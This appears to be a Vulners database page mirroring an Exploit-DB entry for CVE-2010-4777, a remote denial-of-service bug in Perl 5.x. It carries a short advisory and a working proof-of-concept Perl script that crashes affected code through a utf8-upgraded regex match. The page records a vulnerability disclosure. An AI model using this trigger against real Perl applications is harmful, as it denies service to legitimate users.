Lucene search
+L

Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service

🗓️ 23 Mar 2011 00:00:00Reported by Vladimir PerepelitsaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service vulnerability

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-4777
23 Mar 201100:00
circl
cve
CVE
CVE-2010-4777
10 Feb 201417:00
cve
cvelist
Cvelist
CVE-2010-4777
10 Feb 201417:00
cvelist
debiancve
Debian CVE
CVE-2010-4777
10 Feb 201417:00
debiancve
euvd
EUVD
EUVD-2010-4742
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-4777
10 Feb 201418:15
nvd
openvas
OpenVAS
Active Perl Denial of Service Vulnerability (Feb 2014) - Windows
17 Feb 201400:00
openvas
osv
OSV
DEBIAN-CVE-2010-4777
10 Feb 201418:15
osv
osv
OSV
OPENSUSE-SU-2024:10449-1 perl-32bit-5.24.0-3.5 on GA media
15 Jun 202400:00
osv
prion
Prion
Code injection
10 Feb 201418:15
prion
Rows per page
source: https://www.securityfocus.com/bid/47006/info

Perl is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause an application implemented with affected perl code to abort, denying service to legitimate users.

#!/usr/bin/perl


my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Dec 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.06018
26